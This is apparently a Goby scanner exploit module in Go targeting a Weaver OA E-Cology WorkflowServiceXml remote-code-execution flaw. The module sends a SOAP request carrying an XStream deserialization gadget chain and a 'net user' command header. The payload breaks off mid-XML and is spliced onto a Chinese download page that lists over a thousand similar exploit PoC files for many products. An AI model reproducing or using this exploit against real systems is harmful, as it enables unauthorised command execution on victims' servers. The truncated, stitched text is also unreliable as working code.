package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
func init() {
expJson := `{
"Name": "Weaver OA E-Cology Workflowservicexml RCE",
"Description": "Weaver OA E-Cology Workflowservicexml RCE",
"Product": "Weaver OA E-Cology",
"Homepage": "https://www.weaver.com.cn/",
"DisclosureDate": "2021-05-19",
"Author": "PeiQi",
"GobyQuery": "app=\"Weaver-OA\"",
"Level": "3",
"Impact": "RCE",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": null,
"Tags": ["RCE"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Weaver OA"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/services%20/WorkflowServiceXml"
cfg := httpclient.NewPostRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "text/xml")
cfg.Header.Store("Cmd", "net user")
cfg.Data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest><web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                &#x
Goby POC,1275个,自己在网络上收集的,基本是网上能找到的最全的了
需积分: 0 143 浏览量
2023-07-24
15:08:21
上传
评论 2
收藏 1.67MB ZIP 举报
Goby POC,1275个,自己在网络上收集的,基本是网上能找到的最全的了 (1285个子文件) 
Weaver_OA_E_Cology_Workflowservicexml_RCE.go 84KB Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go 81KB ForgeRock_AM_RCE_CVE_2021_35464.go 25KB TopSec_TopACM_Remote_Command_Execution.go 10KB H3C CVM Arbitrary File Upload Vulnerability.go 10KB landray_oa_treexml_rce.go 10KB Zoho_ManageEngine_SAML_rce_CVE_2022_47966.go 10KB Tongda OA Arbitrary User Login Vulnerability.go 10KB CNPOWER OA Arbitrary File Upload Vulnerability.go 10KB nsfocus_resourse.php_arbitrary_file_upload_vulnerability.go 9KB Thinkphp5_Remote_Code_Execution_Vulnerability.go 9KB showDocGo.go 8KB Atlassian_Confluence_Webwork_OGNL_Inject_CVE_2022_26134.go 8KB ThinkPHP5_SQL_Injection.go 7KB TRS-MAS testCommandExecutor.jsp Remote Command Execution.go 6KB F5_BIG_IP_login_bypass_CVE_2022_1388.go 6KB showDocJson.go 6KB ESAFENET_DLP_dataimport_RCE.go 6KB apache_Tomcat_Default_Password.go 6KB H3C_IMC_dynamiccontent.properties.xhtm_RCE.go 6KB Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go 6KB Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go 5KB TG8_FW_RCE_and_Password_Disclosure.go 5KB Tongda_OA_api.ali.php_RCE.go 5KB QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.go 5KB Spring_Cloud_Gateway_RCE_CVE_2022_22947.go 5KB Joomla_unauthorized_CVE_2023_23752.go 5KB Adobe_ColdFusion_upload.cfm_upload_file.go 5KB Atlassian_Bitbucket_archive_RCE_CVE_2022_36804.go 5KB Many_network_devices_have_arbitrary_file_downloads.go 5KB H3C_IMC_rce_CNVD_2021_39067.go 5KB Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go 4KB FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go 4KB tongda_OA_v11.8_getway.php_rce.go 4KB Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go 4KB Joomla_Rest_API__Unauthorized.go 4KB zentao_bypass_rce.go 4KB Apache_Solr_File_Read.go 4KB SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go 4KB TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go 4KB AceNet_AceReporter_Report_component_Arbitrary_file_download.go 4KB dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go 4KB SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go 4KB SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go 4KB thinkphp_lang_rce.go 4KB Panabit_Application_Gateway_ajax_top_backstage_RCE.go 4KB tongda_OA_v11.8_api.ali.php_file_upload.go 4KB Thinkphp_multi_language_rce.go 4KB WangKang_Next_generation_firewall_router_RCE.go 4KB Panabit_iXCache_ajax_cmd_backstage_RCE.go 4KB CMA_upload_file.go 4KB Feng_Office_3.7.0.5_upload_file.go 4KB ThinkPHP_5.0.24_Information_Disclosure_CVE_2022_25481.go 4KB zhiyuan_OA_wpsAssistServlet_upload_file.go 4KB Panabit_Panalog_cmdhandle.php_backstage_RCE.go 4KB ZhongQing_naibo_Education_Cloud_platform_reset_password.go 4KB enjoyscm_UploadFile.go 4KB Jellyfin_Audio_File_read_CVE_2021_21402.go 4KB ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go 4KB vesystem_NGD_rce.go 4KB GLPI_htmLawedTest.php_rce_CVE_2022_35914.go 4KB ShiziyuCms_wxapp.php_File_update.go 4KB NS_ASG_cert_download.php_file_read.go 4KB e_cology9_SQL_injection.go 4KB shiziyu_CMS_image_upload.php_file_upload.go 4KB Telos_Alliance_Omnia_MPX_Node_Information_disclosure_CVE_2022_36642_.go 4KB qianxin_wangkang_NGFW_router_rce.go 4KB TopSec_LB_rce.go 4KB ezOFFICE_OA_smartUpload.jsp_upload_file.go 4KB zentao_11.6_api_getModel_api_getMethod_filePath_file_read.go 4KB xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go 4KB ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go 4KB Selea_OCR_ANPR_SeleaCamera_File_read.go 4KB iAudit_rce.go 4KB Apache_Druid_LoadData_file_read_CVE_2021_36749.go 4KB JEEWMS_Arbitrary_File_Read_Vulnerability.go 4KB Yeastar_TG400_GSM_dir_list_CVE_2021_27328.go 4KB SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go 3KB Kingdee_EAS_dir_list.go 3KB Byzoro_smart_importhtml_php_RCE_CNVD_2021_40201.go 3KB H3C_SecPath_download_file.go 3KB Feishimei_Video_system_Struts2_rce.go 3KB Atlassian_Confluence_doenterpagevariables.action_rce_CVE_2021_26084.go 3KB NVS3000_integrated_video_surveillance_platform_is_not_accessible.go 3KB zhiyuan_OA_A6_createMysql.jsp_Database_information_disclosure.go 3KB Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go 3KB bohuawanglong_FW_cmd.php_rce.go 3KB Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go 3KB Node_RED_ui_base_file_read.go 3KB Sapido_Routers_rce.go 3KB Apache Solr Log4j JNDI RCE.go 3KB AMTT_rce.go 3KB ShowDoc_upload_file.go 3KB Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go 3KB WiseGiga_NAS_rce.go 3KB TOTOLink_download.cgi_rce_CVE_2022_25084.go 3KB D_Link_DAR_8000_importhtml.php_rce.go 3KB Holographic_AI_network_operation_and_maintenance_platform_RCE.go 3KB abiz_Smart_importhtml.php_rce.go 3KB Atlassian_Confluence_OGNL_injection.go 3KB共 1285 条
- 1
- 2
- 3
- 4
- 5
- 6
- 13
资源评论
